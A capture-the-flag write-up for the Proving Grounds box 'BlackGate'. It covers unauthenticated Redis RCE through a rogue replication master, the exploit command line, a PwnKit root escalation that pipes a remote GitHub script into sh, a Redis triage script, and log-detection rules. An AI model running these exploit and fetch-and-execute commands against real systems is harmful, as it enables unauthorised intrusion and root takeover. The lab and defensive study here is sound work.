BlackGate

Source: Proving Grounds
OS: Linux
Community Rating: Intermediate

Enumeration & Reconnaissance

  • I started with autorecon which found:

    • SSH (22)

    • REDIS (6379)

  • Not the usual HTTP…

Service Analysis

  • I opened port 6379 in my web browser and received the message: "-ERR wrong number of arguments for 'get' command". Redis had read the browser's request line, GET / HTTP/1.1, as its own GET command with two arguments instead of one key. Getting an -ERR reply rather than -NOAUTH also shows that the instance accepts commands without authentication.

[Screenshot: Redis error message]
  • I kept poking around for a while, then searched for CVEs. I found a well-known technique that gives RCE through a rogue Redis server: the attacker runs a fake master, tells the target to replicate from it with SLAVEOF/REPLICAOF, streams a malicious shared object in place of the RDB dump, and then loads it with MODULE LOAD to get a command-execution primitive. It needs an unauthenticated Redis 4.x/5.x instance that exposes the MODULE command, which is what the error message above suggested.
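As an added example, not code from the writeup and not the redis-rogue-server PoC, the script below does the triage the two observations above imply. It speaks raw RESP over a socket, shows why a browser's request line draws that GET arity error, and checks the preconditions the rogue-master technique depends on: no AUTH required and the MODULE command available. The SAMPLE_* replies are constructed to look like a stock 5.0.x server, and the probe() helper, the note wording and the version thresholds are my own assumptions.

```python
"""Triage an exposed Redis instance for the rogue-master / MODULE LOAD technique.

Added example: not the redis-rogue-server PoC and not code from the writeup.
Raw RESP over a socket (no redis-py needed); SAMPLE_* replies are constructed.
"""
import socket


class RespError(str):
    """A '-ERR ...' or '-NOAUTH ...' reply, kept as a value so callers can inspect it."""


def encode_command(*args):
    """Encode a command as a RESP array, exactly as redis-cli puts it on the wire."""
    out = b"*%d\r\n" % len(args)
    for arg in args:
        raw = str(arg).encode()
        out += b"$%d\r\n%s\r\n" % (len(raw), raw)
    return out


def inline_tokens(line):
    """Redis's inline protocol splits a bare line on whitespace. A browser's
    'GET / HTTP/1.1' therefore becomes GET with two arguments; GET takes exactly
    one key, hence "-ERR wrong number of arguments for 'get' command"."""
    return line.split()


def parse_resp(buf):
    """Parse one RESP value from buf; return (value, remaining_bytes).
    Raises ValueError/IndexError when buf does not yet hold a complete value."""
    kind = buf[0:1]
    end = buf.index(b"\r\n")
    line = buf[1:end].decode()
    rest = buf[end + 2:]
    if kind == b"+":
        return line, rest
    if kind == b"-":
        return RespError(line), rest
    if kind == b":":
        return int(line), rest
    if kind == b"$":
        n = int(line)
        if n == -1:
            return None, rest
        if len(rest) < n + 2:
            raise ValueError("incomplete bulk string")
        return rest[:n].decode(), rest[n + 2:]
    if kind == b"*":
        items = []
        for _ in range(int(line)):
            item, rest = parse_resp(rest)
            items.append(item)
        return items, rest
    raise ValueError(f"unknown RESP type {kind!r}")


def parse_info(text):
    """Turn INFO output ('key:value' lines, '#' section headers) into a dict."""
    fields = {}
    for line in text.splitlines():
        if line and not line.startswith("#") and ":" in line:
            key, value = line.split(":", 1)
            fields[key] = value
    return fields


def assess(ping_reply, info_reply, module_list_reply):
    """Decide from three raw replies whether replication + MODULE LOAD is likely to work."""
    result = {"auth_required": False, "version": None, "module_command": False,
              "rogue_master_likely": False, "notes": []}
    ping, _ = parse_resp(ping_reply)
    if isinstance(ping, RespError):
        result["auth_required"] = ping.startswith("NOAUTH")
        result["notes"].append(f"PING refused: {ping} (AUTH or protected mode needed first)")
        return result
    info, _ = parse_resp(info_reply)
    version = parse_info(info).get("redis_version", "")
    result["version"] = version
    major = int(version.split(".")[0]) if version[:1].isdigit() else 0
    modules, _ = parse_resp(module_list_reply)
    result["module_command"] = not isinstance(modules, RespError)
    if major < 4:
        result["notes"].append("pre-4.0: no module API; only the CONFIG SET dir/dbfilename file-write trick applies")
    elif not result["module_command"]:
        result["notes"].append("MODULE command refused (Redis 7 ships with enable-module-command no)")
    else:
        result["rogue_master_likely"] = True
        result["notes"].append(f"unauthenticated Redis {version} with MODULE LOAD: a rogue master can push and load a .so")
    return result


def recv_reply(sock):
    """Read until one complete RESP value has arrived."""
    buf = b""
    while True:
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("connection closed mid-reply")
        buf += chunk
        try:
            parse_resp(buf)
            return buf
        except (ValueError, IndexError):
            continue  # need more bytes


def probe(host, port=6379, timeout=3.0):
    """Live version (assumed helper): PING, INFO server, MODULE LIST, then assess."""
    replies = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        for cmd in (("PING",), ("INFO", "server"), ("MODULE", "LIST")):
            sock.sendall(encode_command(*cmd))
            replies.append(recv_reply(sock))
    return assess(*replies)


def _bulk(text):
    raw = text.encode()
    return b"$%d\r\n%s\r\n" % (len(raw), raw)


# Constructed replies modelled on a stock 5.0.x server (not captured from the box).
SAMPLE_PING = b"+PONG\r\n"
SAMPLE_NOAUTH = b"-NOAUTH Authentication required.\r\n"
SAMPLE_INFO = _bulk("# Server\r\nredis_version:5.0.9\r\nredis_mode:standalone\r\ntcp_port:6379\r\n")
SAMPLE_MODULE_LIST = b"*0\r\n"
SAMPLE_MODULE_DENIED = b"-ERR MODULE command not allowed\r\n"

if __name__ == "__main__":
    import sys
    print(probe(sys.argv[1]))
```

Run it as `python3 redis_triage.py 192.168.192.176` against a lab target; the offline samples exercise the three outcomes (exploitable, AUTH required, MODULE refused) without a network.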

Gaining Initial Access

  • I got the PoC and ran it a few times before it successfully gave me a shell:

python redis-rogue-server.py --rhost 192.168.192.176 --lhost 192.168.45.201
[Screenshot: redis-rogue-server output and the resulting shell]

Privilege Escalation

  • While I was in, I looked for privilege escalation vectors. I started with the basics: running sudo -l revealed that /usr/local/bin/redis-status could be run as root without a password. However, I couldn't find a known exploit for it, and I couldn't run it since it requires an authorization key.

[Screenshot: redis-status prompting for an authorization key]
  • I then checked other things like cron jobs, kernel exploits, SUID binaries, etc., but nothing worked.

  • There were multiple articles about a way to exploit Redis by writing an SSH key into a user's authorized_keys file (CONFIG SET dir and dbfilename, then SAVE, so the RDB dump lands in ~/.ssh). I dug into this for a while before calling it off. I then went through the list of CVEs that linpeas showed.

[Screenshot: linpeas CVE list]
  • The first one I tried (CVE-2021-3490, an eBPF verifier bug in the kernel) didn't work, but CVE-2021-4034 (PwnKit, the pkexec local privilege escalation) worked right away. I just had to run:

sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
  • and I got root. Note that the one-liner pipes a script from GitHub straight into sh; outside a lab, download it, read it and build it yourself first.

[Screenshot: root shell]

Lessons Learned

  • An unauthenticated Redis instance reachable over the network is an RCE vector: a rogue master can push a shared object over replication and have the target load it with MODULE LOAD. Set requirepass, bind to localhost, and disable or rename the MODULE, SLAVEOF/REPLICAOF and CONFIG commands if they are not needed.

  • When the first kernel CVE fails, keep working down the list: the host was still running a pkexec vulnerable to CVE-2021-4034, which gave root in one command.
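On the defensive side of both lessons, here is an added example that is not from the writeup: detection logic run over constructed log lines. The Redis patterns follow the notices redis-server writes when a replica is configured and a module is loaded; the pkexec pattern is the environment sanity-check message that Qualys noted PwnKit exploitation leaves in the auth log. The sample lines, rule names and the ten-minute correlation window are assumptions; confirm the message formats against the Redis and polkit versions you actually run.

```python
"""Hunt for the rogue-master RCE and for PwnKit artefacts in host logs.

Added example, not from the writeup. The Redis lines use redis-server's
'pid:role date level message' layout; all sample lines are constructed.
"""
import re
from datetime import datetime, timedelta

REDIS_LINE = re.compile(
    r"^(?P<pid>\d+):(?P<role>[MSC]) (?P<ts>\d{1,2} \w{3} \d{4} \d{2}:\d{2}:\d{2}\.\d{3}) "
    r"(?P<level>[-.*#]) (?P<msg>.*)$")
# 5.x logs "REPLICAOF host:port enabled (...)", 4.x logs "SLAVE OF host:port enabled (...)".
REPLICA_ENABLED = re.compile(
    r"^(?:REPLICAOF|SLAVE OF) (?P<master>\S+):(?P<port>\d+) enabled \(user request from '(?P<client>[^']*)'\)")
MODULE_LOADED = re.compile(r"^Module '(?P<name>[^']+)' loaded from (?P<path>\S+)")
SCRATCH_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")

PKEXEC_LINE = re.compile(r"pkexec\[(?P<pid>\d+)\]: (?P<msg>.*)$")
# pkexec only emits these when its environment checks fail; the spelling of
# "suspicious" differs between sources, so match loosely.
PKEXEC_MARKERS = (
    re.compile(r"The value for the SHELL variable was not found the /etc/shells file"),
    re.compile(r"The value for environment variable \S+ contains sus\w+ content"),
)


def scan_redis(lines, trusted_masters=frozenset(), window=timedelta(minutes=10)):
    """Flag an untrusted REPLICAOF, a module loaded from a scratch directory, and
    (the signature of the rogue-master RCE) a module load shortly after the former."""
    findings, last_untrusted = [], None
    for line in lines:
        m = REDIS_LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%d %b %Y %H:%M:%S.%f")
        rep = REPLICA_ENABLED.match(m["msg"])
        if rep and rep["master"] not in trusted_masters:
            last_untrusted = ts
            client = re.search(r"addr=(\S+)", rep["client"])
            findings.append({"rule": "untrusted-replicaof", "severity": "medium", "ts": ts,
                             "detail": f"replicating from {rep['master']}:{rep['port']} "
                                       f"requested by {client.group(1) if client else '?'}"})
            continue
        mod = MODULE_LOADED.match(m["msg"])
        if mod:
            if mod["path"].startswith(SCRATCH_DIRS):
                findings.append({"rule": "module-load-from-scratch-dir", "severity": "high", "ts": ts,
                                 "detail": f"module {mod['name']} loaded from {mod['path']}"})
            if last_untrusted is not None and ts - last_untrusted <= window:
                findings.append({"rule": "rogue-master-rce", "severity": "critical", "ts": ts,
                                 "detail": f"MODULE LOAD {int((ts - last_untrusted).total_seconds())}s "
                                           "after an untrusted REPLICAOF"})
    return findings


def scan_auth_log(lines):
    """Flag pkexec environment-check failures, an artefact of CVE-2021-4034 exploitation."""
    findings = []
    for line in lines:
        m = PKEXEC_LINE.search(line)
        if m and any(marker.search(m["msg"]) for marker in PKEXEC_MARKERS):
            findings.append({"rule": "pkexec-env-check-failure", "severity": "high",
                             "pid": int(m["pid"]), "detail": m["msg"]})
    return findings


# Constructed sample logs (not captured from the box), shaped like the real ones.
SAMPLE_REDIS_LOG = """\
1337:M 10 Jan 2022 14:02:11.120 * REPLICAOF 192.168.45.201:21000 enabled (user request from 'id=5 addr=192.168.45.201:40122 fd=8 name= age=0 idle=0 flags=N db=0 cmd=slaveof')
1337:S 10 Jan 2022 14:02:12.004 * Connecting to MASTER 192.168.45.201:21000
1337:S 10 Jan 2022 14:02:12.005 * MASTER <-> REPLICA sync started
1337:S 10 Jan 2022 14:02:12.300 * MASTER <-> REPLICA sync: receiving 21640 bytes from master
1337:S 10 Jan 2022 14:02:12.303 # Failed trying to load the MASTER synchronization DB from disk
1337:S 10 Jan 2022 14:02:13.010 * Module 'system' loaded from /tmp/exp.so
"""
SAMPLE_AUTH_LOG = """\
Jan 10 14:00:01 blackgate pkexec[2100]: alice: Executing command [USER=root] [TTY=/dev/pts/0] [CWD=/home/alice] [COMMAND=/usr/bin/id]
Jan 10 14:05:33 blackgate pkexec[2291]: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=unknown] [CWD=/tmp] [COMMAND=]
"""

if __name__ == "__main__":
    for f in scan_redis(SAMPLE_REDIS_LOG.splitlines()) + scan_auth_log(SAMPLE_AUTH_LOG.splitlines()):
        print(f)
```

Point scan_redis at /var/log/redis/redis-server.log with your real replica topology in trusted_masters; a legitimate replica produces the REPLICAOF line too, which is why the rule correlates it with a module load instead of alerting on it alone.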
